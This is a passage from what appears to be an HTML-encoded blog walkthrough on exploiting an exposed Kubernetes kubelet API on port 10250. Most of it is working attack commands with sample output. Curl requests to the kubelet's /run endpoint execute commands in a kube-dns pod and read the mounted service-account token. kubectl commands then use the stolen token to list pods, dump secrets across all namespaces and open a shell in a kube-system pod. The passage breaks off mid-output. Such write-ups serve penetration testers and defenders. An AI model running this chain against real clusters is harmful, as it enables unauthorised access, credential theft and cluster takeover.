new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 var\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nCheck the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:\u003Cbr \/\u003E\n1. the mounted folder\u003Cbr \/\u003E\n2. the cloud metadata url\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nCheck the env with the following command:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -k -XPOST \"https:\/\/k8-node:10250\/run\/kube-system\/kube-dns-5b1234c4d5-4321\/dnsmasq\" -d \"cmd=env\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\nWe are looking for the KUBLET_CERT, KUBLET_KEY, \u0026amp; CA_CERT environment variables.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-OqALsU3GtcY\/XDZc2KK24aI\/AAAAAAAACZ8\/9n9Vz4riZMIXwdCcwMkMTGcv9s7uoEsYwCLcBGAs\/s1600\/Screen%2BShot%2B2019-01-09%2Bat%2B3.42.09%2BPM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"422\" data-original-width=\"1234\" height=\"136\" src=\"https:\/\/3.bp.blogspot.com\/-OqALsU3GtcY\/XDZc2KK24aI\/AAAAAAAACZ8\/9n9Vz4riZMIXwdCcwMkMTGcv9s7uoEsYwCLcBGAs\/s400\/Screen%2BShot%2B2019-01-09%2Bat%2B3.42.09%2BPM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nWe are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nKUBERNETES_PORT=tcp:\/\/10.10.10.10:443\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nor\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nKUBERNETES_MASTER_NAME: 10.11.12.13:443\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nOnce we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them.\u0026nbsp; This may be (if we are lucky) another public IP or a 10. IP.\u0026nbsp; If it's a 10. IP we need to download kubectl to the pod.\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nAssuming it's not in the environment variables let's look and see if they are there in the mounted secrets\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -k -XPOST \"https:\/\/k8-node:10250\/run\/kube-system\/kube-dns-5b1234c4d5-4321\/dnsmasq\"\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp;-d \"cmd=mount\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003Esample output truncated:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecgroup on \/sys\/fs\/cgroup\/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Emqueue on \/dev\/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda1 on \/dev\/termination-log type ext4 (rw,relatime,commit=30,data=ordered)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda1 on \/etc\/k8s\/dns\/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cb\u003Etmpfs on \/var\/run\/secrets\/kubernetes.io\/serviceaccount type tmpfs (ro,relatime)\u003C\/b\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda1 on \/etc\/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda1 on \/etc\/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/dev\/sda1 on \/etc\/hosts type ext4 (rw,relatime,commit=30,data=ordered)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eshm on \/dev\/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EWe can then cat out the ca.cert, namespace, and token\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -k -XPOST \"https:\/\/k8-node:10250\/run\/kube-system\/kube-dns-5b1234c4d5-4321\/dnsmasq\"\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp;-d \"cmd=ls -la \/var\/run\/secrets\/kubernetes.io\/serviceaccount\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-size: x-small;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EOutput:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-size: x-small;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Etotal 4\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxrwxrwt\u0026nbsp; \u0026nbsp; 3 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;140 Nov\u0026nbsp; 9 16:27 .\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 3 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Nov\u0026nbsp; 9 16:27 ..\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Elrwxrwxrwx\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 13 Nov\u0026nbsp; 9 16:27 ca.crt -\u0026gt; ..data\/ca.crt\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Elrwxrwxrwx\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 16 Nov\u0026nbsp; 9 16:27 namespace -\u0026gt; ..data\/namespace\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Elrwxrwxrwx\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 12 Nov\u0026nbsp; 9 16:27 token -\u0026gt; ..data\/token\u003C\/span\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nand then:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -k -XPOST \"https:\/\/k8-node:10250\/run\/kube-system\/kube-dns-5b1234c4d5-4321\/dnsmasq\"\u0026nbsp;-d \"cmd=cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003Eoutput:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EeyJhbGciOiJSUzI1NiI---SNIP---\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003EAlso grab the ca.crt :-)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\nWith the token, ca.crt and api server IP address we can issue commands with kubectl.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ kubectl --server=https:\/\/1.2.3.4 --certificate-authority=ca.crt --token=\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EeyJhbGciOiJSUzI1NiI---SNIP---\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp;get pods --all-namespaces\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nOutput:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003ENAMESPACE\u0026nbsp; \u0026nbsp; \u0026nbsp;NAME\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; READY\u0026nbsp; \u0026nbsp; \u0026nbsp;STATUS\u0026nbsp; \u0026nbsp; RESTARTS\u0026nbsp; \u0026nbsp;AGE\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;event-exporter-v0.1.9-5c-SNIP\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2\/2\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;2\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 120d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;fluentd-cloud-logging-gke-eeme-api-default-pool\u0026nbsp; \u0026nbsp;1\/1\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;1\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2y\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;heapster-v1.5.2-5-SNIP\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 3\/3\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;0\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 27d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;kube-dns-5b8-SNIP\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;4\/4\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;0\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 61d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;kube-dns-autoscaler-2-SNIP\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1\/1\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;1\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 252d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;kube-proxy-gke-eeme-api-default-pool\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1\/1\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;1\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2y\u0026nbsp;\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;kubernetes-dashboard-7-SNIP\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1\/1\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;0\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 27d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;l7-default-backend-10-SNIP\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1\/1\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;0\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 27d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ekube-system\u0026nbsp; \u0026nbsp;metrics-server-v0.2.1-7-SNIP\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2\/2\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;0\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 120d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nat this point you can pull secrets or exec into any available pods\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ kubectl --server=https:\/\/1.2.3.4 --certificate-authority=ca.crt --token=\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EeyJhbGciOiJSUzI1NiI---SNIP---\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp;get secrets --all-namespaces\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nto get a shell via kubectl\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ kubectl --server=https:\/\/1.2.3.4 --certificate-authority=ca.crt --token=\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EeyJhbGciOiJSUzI1NiI---SNIP---\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp;get pods --namespace=kube-system\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003ENAME\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; READY\u0026nbsp; \u0026nbsp; \u0026nbsp;STATUS\u0026nbsp; \u0026nbsp; RESTARTS\u0026nbsp; \u0026nbsp;AGE\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Eevent-exporter-v0.1.9-5-SNIP\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2\/2\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;2\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 120d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E--SNIP--\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cb\u003Emetrics-server-v0.2.1-7f8ee58c8f-ab13f\u003C\/b\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp;2\/2\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Running\u0026nbsp; \u0026nbsp;0\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 120d\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ kubectl\u0026nbsp;\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eexec -it metrics-server-v0.2.1-7f8ee58c8f-\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eab13f\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp;--namespace=kube-system\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E--server=https:\/\/1.2.3.4\u0026nbsp; --certificate-authority=ca.crt --token=\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EeyJhbGciOiJSUzI1NiI---SNIP---\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp;\/bin\/sh\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\/ # ls -lah\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Etotal 40220\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Sep 11 07:25 .\u003C\/span\u003E\u003Cbr 